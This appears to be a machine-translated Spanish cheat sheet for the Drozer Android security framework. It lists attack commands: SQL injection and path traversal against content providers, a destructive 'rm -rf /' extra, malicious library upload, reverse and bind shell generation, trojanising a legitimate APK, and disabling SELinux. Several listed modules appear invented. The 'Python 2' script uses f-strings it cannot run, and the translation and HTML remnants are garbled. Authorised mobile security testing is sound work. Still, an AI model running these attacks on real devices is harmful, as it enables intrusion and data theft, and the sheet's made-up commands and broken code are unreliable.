Drozer Cheat Sheet
"Clase de la hoja"
########################################################################################################################################################################################################################################################## Copiar todos los comandos
id="drozer-pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada
Sinopsis
Drozer es un marco de pruebas de seguridad integral para aplicaciones Android. Le permite asumir el papel de una aplicación Android e interactuar con el VM Dalvik, los puntos finales de IPC de otras aplicaciones y el sistema operativo subyacente. Drozer proporciona herramientas para la explotación remota de dispositivos Android a través de aplicaciones maliciosas y evaluación de seguridad integral de aplicaciones Android.
NOVEDAD Advertencia: Únicamente use Drozer en dispositivos y aplicaciones que posee o tenga permiso explícito para probar. El uso no autorizado puede violar términos de servicio o leyes locales.
Instalación
Prerrequisitos
# Install Java Development Kit
sudo apt update
sudo apt install openjdk-11-jdk
# Install Python 2.7 (required for Drozer)
sudo apt install python2.7 python2.7-dev python-pip
# Install Android SDK and ADB
sudo apt install android-tools-adb android-tools-fastboot
# Set JAVA_HOME environment variable
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
echo 'export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64' >> ~/.bashrc
Instalación de Linux
# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl
# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py install
macOS Instalación
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install Python 2.7
brew install python@2
# Install Drozer
pip2 install drozer
# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
Instalación de Windows
# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/
# Install Drozer using pip
pip install drozer
# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/
Android Device Setup
# Enable USB debugging on Android device
# Settings > Developer Options > USB Debugging
# Install Drozer agent on device
adb install drozer-agent-2.4.4.apk
# Start Drozer agent on device
# Open Drozer Agent app and toggle "Embedded Server" ON
# Forward port for communication
adb forward tcp:31415 tcp:31415
Uso básico
Conexión al dispositivo
# Connect to Drozer agent
drozer console connect
# Connect with specific endpoint
drozer console connect --server 192.168.1.100:31415
# List available devices
drozer console devices
# Connect to specific device
drozer console connect --device <device_id>
Comandos básicos
# List available modules
dz> list
# Get help for specific module
dz> help app.package.list
# List installed packages
dz> run app.package.list
# Get package information
dz> run app.package.info -a com.example.app
# List activities
dz> run app.activity.info -a com.example.app
# List services
dz> run app.service.info -a com.example.app
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
Análisis de paquetes
Información sobre paquetes
# List all packages
dz> run app.package.list
# List packages with filter
dz> run app.package.list -f keyword
# Get detailed package information
dz> run app.package.info -a com.example.app
# List package permissions
dz> run app.package.info -a com.example.app -p
# Find packages with specific permission
dz> run app.package.list -p android.permission.INTERNET
# List system packages
dz> run app.package.list -f system
# List third-party packages
dz> run app.package.list -3
Componentes de aplicación
# List activities
dz> run app.activity.info -a com.example.app
# List exported activities
dz> run app.activity.info -a com.example.app -e
# List services
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -e
Pruebas de actividad
Actividad Enumeración
# Find activities in package
dz> run app.activity.info -a com.example.app
# Find exported activities
dz> run app.activity.info -a com.example.app -e
# Find activities with intent filters
dz> run app.activity.info -a com.example.app -i
# Search for activities by permission
dz> run app.activity.info -p android.permission.CAMERA
Explotación de actividad
# Start activity
dz> run app.activity.start --component com.example.app com.example.MainActivity
# Start activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret
# Start activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data
# Start activity with specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com
# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug true
Pruebas de servicio
Service Enumeration
# List services in package
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# Find services with specific permissions
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMIN
Gastos de servicio
# Start service
dz> run app.service.start --component com.example.app com.example.BackgroundService
# Start service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"
# Send intent to service
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"
# Test service binding
dz> run app.service.bind com.example.app com.example.BackgroundService
Pruebas de Proveedor de Contenido
Proveedor de contenidos
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -e
# Find URIs for content provider
dz> run app.provider.finduri com.example.provider
# Scan for accessible content URIs
dz> run scanner.provider.finduris -a com.example.app
Explotación del Proveedor de Contenido
# Query content provider
dz> run app.provider.query content://com.example.provider/users
# Query with selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin
# Insert data into content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret
# Update data in content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword
# Delete data from content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"
# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"
# Read files via content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts
# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txt
Pruebas de receptor de radiodifusión
Enumeración del receptor de radiodifusión
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# Find receivers for specific intent
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETED
Explotación del receptor de radio
# Send broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION
# Send broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"
# Send system broadcasts
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED
# Send ordered broadcast
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high
# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode true
Análisis del sistema de archivos
Enumeración del sistema de archivos
# List application files
dz> run tools.file.list /data/data/com.example.app/
# Find readable files
dz> run tools.file.readable /data/data/com.example.app/
# Find writable files
dz> run tools.file.writable /data/data/com.example.app/
# Search for files with specific patterns
dz> run tools.file.find /data/data/com.example.app/ "*.db"
# Find world-readable files
dz> run tools.file.permissions /data/data/com.example.app/
Explotación del sistema de archivos
# Read file contents
dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml
# Download file
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db
# Upload file
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so
# Create symbolic link
dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt
# Change file permissions
dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt
Análisis de bases de datos
Pruebas de bases de datos SQLite
# Find SQLite databases
dz> run tools.file.find /data/data/com.example.app/ "*.db"
# Connect to SQLite database
dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db
# List tables in database
dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db
# Query database
dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"
# Test for SQL injection in content providers
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"
# Dump database schema
dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db
# Export database
dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql
Análisis de redes
Configuración de red
# Check network security config
dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml
# List network interfaces
dz> run tools.setup.network
# Check for cleartext traffic
dz> run scanner.misc.checknetworksecurityconfig -a com.example.app
# Test for certificate pinning bypass
dz> run scanner.misc.checkpinning -a com.example.app
Pruebas SSL/TLS
# Test SSL certificate validation
dz> run scanner.misc.native -a com.example.app
# Check for weak SSL implementations
dz> run scanner.misc.checkssl -a com.example.app
# Test for certificate transparency
dz> run scanner.misc.checkcertificatetransparency -a com.example.app
Explotación avanzada
Desarrollo de módulos personalizados
# Create custom Drozer module
# File: ~/.drozer_modules/custom/exploit.py
from drozer.modules import common, Module
class CustomExploit(Module, common.FileSystem, common.PackageManager):
name = "Custom Exploit Module"
description = "Custom exploitation module"
examples = "run custom.exploit -a com.example.app"
author = "Security Researcher"
date = "2024-01-01"
license = "BSD (3 clause)"
path = ["custom"]
def add_arguments(self, parser):
parser.add_argument("-a", "--package", help="target package")
def execute(self, arguments):
if arguments.package:
self.stdout.write("Exploiting package: %s\n" % arguments.package)
# Custom exploitation logic here
else:
self.stdout.write("Please specify target package\n")
Generación de carga útil
# Generate malicious APK
dz> run payload.apk.create --output /tmp/malicious.apk
# Generate reverse shell payload
dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444
# Generate bind shell payload
dz> run payload.bind.shell --port 4444
# Embed payload in legitimate APK
dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk
Escalada de Privilege
# Check for root access
dz> run tools.setup.busybox
# Exploit setuid binaries
dz> run exploit.setuid.find
# Test for kernel exploits
dz> run exploit.kernel.check
# Exploit application vulnerabilities
dz> run exploit.app.privilege -a com.example.app
# Test for directory traversal
dz> run exploit.traversal.test -a com.example.app
Scripts de automatización
Script de Evaluación Integral
#!/usr/bin/env python2
import subprocess
import json
import sys
class DrozerAutomation:
def __init__(self, package_name):
self.package = package_name
self.results = \\\\{\\\\}
def run_drozer_command(self, command):
"""Execute Drozer command and return output"""
try:
cmd = ["drozer", "console", "connect", "-c", command]
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
return output.decode('utf-8')
except subprocess.CalledProcessError as e:
return f"Error: \\\\{e.output.decode('utf-8')\\\\}"
def analyze_package(self):
"""Perform comprehensive package analysis"""
print(f"[+] Analyzing package: \\\\{self.package\\\\}")
# Package information
self.results['package_info'] = self.run_drozer_command(
f"run app.package.info -a \\\\{self.package\\\\}"
)
# Activities
self.results['activities'] = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\}"
)
# Services
self.results['services'] = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\}"
)
# Content Providers
self.results['providers'] = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\}"
)
# Broadcast Receivers
self.results['receivers'] = self.run_drozer_command(
f"run app.broadcast.info -a \\\\{self.package\\\\}"
)
return self.results
def test_exported_components(self):
"""Test exported components for vulnerabilities"""
print("[+] Testing exported components")
# Test exported activities
exported_activities = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\} -e"
)
# Test exported services
exported_services = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\} -e"
)
# Test exported providers
exported_providers = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\} -e"
)
return \\\\{
'exported_activities': exported_activities,
'exported_services': exported_services,
'exported_providers': exported_providers
\\\\}
def test_content_providers(self):
"""Test content providers for vulnerabilities"""
print("[+] Testing content providers")
# Find URIs
uris = self.run_drozer_command(
f"run app.provider.finduri \\\\{self.package\\\\}"
)
# Scan for accessible URIs
accessible_uris = self.run_drozer_command(
f"run scanner.provider.finduris -a \\\\{self.package\\\\}"
)
return \\\\{
'uris': uris,
'accessible_uris': accessible_uris
\\\\}
def generate_report(self):
"""Generate comprehensive security report"""
report = \\\\{
'package': self.package,
'analysis_results': self.results,
'exported_components': self.test_exported_components(),
'content_provider_tests': self.test_content_providers()
\\\\}
with open(f"\\\\{self.package\\\\}_security_report.json", 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Report saved: \\\\{self.package\\\\}_security_report.json")
return report
# Usage
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python2 drozer_automation.py <package_name>")
sys.exit(1)
package_name = sys.argv[1]
analyzer = DrozerAutomation(package_name)
analyzer.analyze_package()
analyzer.generate_report()
Batch Testing Script
#!/bin/bash
# Batch testing script for multiple packages
PACKAGES_FILE="packages.txt"
RESULTS_DIR="drozer_results"
mkdir -p $RESULTS_DIR
while IFS= read -r package; do
echo "[+] Testing package: $package"
# Create package-specific directory
mkdir -p "$RESULTS_DIR/$package"
# Run comprehensive tests
drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"
# Test content providers
drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"
# Test for common vulnerabilities
drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"
echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"
echo "[+] Batch testing completed"
Solución de problemas
Cuestiones de conexión
# Check if Drozer agent is running
adb shell am start -n com.mwr.dz/.activities.MainActivity
# Verify port forwarding
adb forward --list
adb forward tcp:31415 tcp:31415
# Restart ADB server
adb kill-server
adb start-server
# Check device connectivity
adb devices
# Test connection manually
telnet localhost 31415
Cuestiones de agente
# Reinstall Drozer agent
adb uninstall com.mwr.dz
adb install drozer-agent-2.4.4.apk
# Check agent permissions
adb shell dumpsys package com.mwr.dz
# Enable agent in device settings
# Settings > Apps > Drozer Agent > Permissions
# Check if agent service is running
adb shell ps|grep drozer
Cuestiones de módulo
# Refresh module list
dz> reload
# Check module path
dz> list
# Install custom modules
mkdir -p ~/.drozer_modules
cp custom_module.py ~/.drozer_modules/
# Debug module loading
dz> help custom.module
Cuestiones de admisión
# Check required permissions
adb shell dumpsys package com.example.app|grep permission
# Grant permissions manually
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE
# Check SELinux status
adb shell getenforce
# Disable SELinux (if rooted)
adb shell su -c "setenforce 0"
Cuestiones de ejecución
# Increase timeout values
dz> set timeout 30
# Reduce output verbosity
dz> set verbose false
# Clear cache
rm -rf ~/.drozer/cache/
# Use specific device
drozer console connect --device <device_id>
Recursos
- Documentación oficial de Drozer
- Drozer GitHub Repository
- Drozer User Guide
- Evaluación de seguridad de Android con Drozer
- Guía de prueba de seguridad móvil de la OPEP
- Android Application Security
- Drozer Module Development
-...
*Esta hoja de trampa proporciona una referencia completa para el uso de Drozer para las pruebas de seguridad de aplicaciones Android. Siempre asegúrese de tener una autorización adecuada antes de probar cualquier aplicación o dispositivo Android. *